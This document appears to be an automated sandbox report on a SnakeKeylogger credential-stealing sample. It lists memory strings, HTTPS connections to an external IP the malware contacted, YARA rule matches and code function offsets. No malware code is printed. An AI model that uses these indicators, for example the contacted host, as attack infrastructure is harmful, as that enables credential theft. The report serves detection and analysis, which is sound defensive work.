                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.000000000419D000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004150000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004417000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042F4000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003F27000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CAD000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C60000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.000000000412B000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042CF000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042FA000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004156000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.000000000419D000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004150000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004417000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042F4000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003F27000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CAD000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C60000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.000000000412B000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042CF000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042FA000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004156000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D73000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.000000000325F000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 13.2.lyNyKapwZJLKnn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 6360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7260, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_0110E12C0_2_0110E12C
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD0A280_2_06FD0A28
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD17A80_2_06FD17A8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD17980_2_06FD1798
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD85380_2_06FD8538
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD02700_2_06FD0270
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD12700_2_06FD1270
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD02610_2_06FD0261
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD12600_2_06FD1260
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD031B0_2_06FD031B
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD80BE0_2_06FD80BE
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FDA1C00_2_06FDA1C0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FDAA980_2_06FDAA98
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD0A180_2_06FD0A18
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD89700_2_06FD8970
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD89600_2_06FD8960
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0D2786_2_02F0D278
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F053626_2_02F05362
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0C1486_2_02F0C148
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F071186_2_02F07118
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0C7386_2_02F0C738
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0C4686_2_02F0C468
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0CA086_2_02F0CA08
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F069B06_2_02F069B0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0E9886_2_02F0E988
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F03E186_2_02F03E18
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0CFA96_2_02F0CFA9
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0CCD86_2_02F0CCD8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F09DE06_2_02F09DE0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F03A996_2_02F03A99
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F029E06_2_02F029E0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0F9706_2_02F0F970
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0E97A6_2_02F0E97A
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_02F0F9616_2_02F0F961
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF1E806_2_06CF1E80
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF17A06_2_06CF17A0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFFC686_2_06CFFC68
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF9C186_2_06CF9C18
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF95486_2_06CF9548
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF0B306_2_06CF0B30
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF50286_2_06CF5028
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF29686_2_06CF2968
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFE6AF6_2_06CFE6AF
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFE6B06_2_06CFE6B0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF1E706_2_06CF1E70
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFDE006_2_06CFDE00
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF178F6_2_06CF178F
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFEF516_2_06CFEF51
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFEF606_2_06CFEF60
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFCCA06_2_06CFCCA0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFDDFF6_2_06CFDDFF
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFD5406_2_06CFD540
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFD5506_2_06CFD550
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFEAF86_2_06CFEAF8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFE2496_2_06CFE249
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFE2586_2_06CFE258
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF8BA06_2_06CF8BA0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFF3B86_2_06CFF3B8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFEB086_2_06CFEB08
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF0B206_2_06CF0B20
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFD0F86_2_06CFD0F8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF00406_2_06CF0040
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFF8016_2_06CFF801
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF501E6_2_06CF501E
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFF8106_2_06CFF810
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF00236_2_06CF0023
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFD9996_2_06CFD999
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CFD9A86_2_06CFD9A8
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 7_2_0173E12C7_2_0173E12C
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114C14613_2_0114C146
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114536213_2_01145362
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114D27813_2_0114D278
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114C46813_2_0114C468
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114C73813_2_0114C738
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114E98813_2_0114E988
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_011469A013_2_011469A0
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114CA0813_2_0114CA08
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_01149DE013_2_01149DE0
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114CCD813_2_0114CCD8
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114CFAC13_2_0114CFAC
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_01146FC813_2_01146FC8
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_01143E0913_2_01143E09
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114E97C13_2_0114E97C
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_0114F96113_2_0114F961
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_011429EC13_2_011429EC
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_01143AB113_2_01143AB1
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 2i3Lj7a8Gk.exe
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 2i3Lj7a8Gk.exe
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1729897967.0000000007360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 2i3Lj7a8Gk.exe
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000000.1688834254.000000000077C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOQhQ.exe@ vs 2i3Lj7a8Gk.exe
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1721375528.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 2i3Lj7a8Gk.exe
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1722967795.0000000002D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 2i3Lj7a8Gk.exe
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4140939601.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 2i3Lj7a8Gk.exe
                  Source: 2i3Lj7a8Gk.exeBinary or memory string: OriginalFilenameOQhQ.exe@ vs 2i3Lj7a8Gk.exe
                  Source: 2i3Lj7a8Gk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 13.2.lyNyKapwZJLKnn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
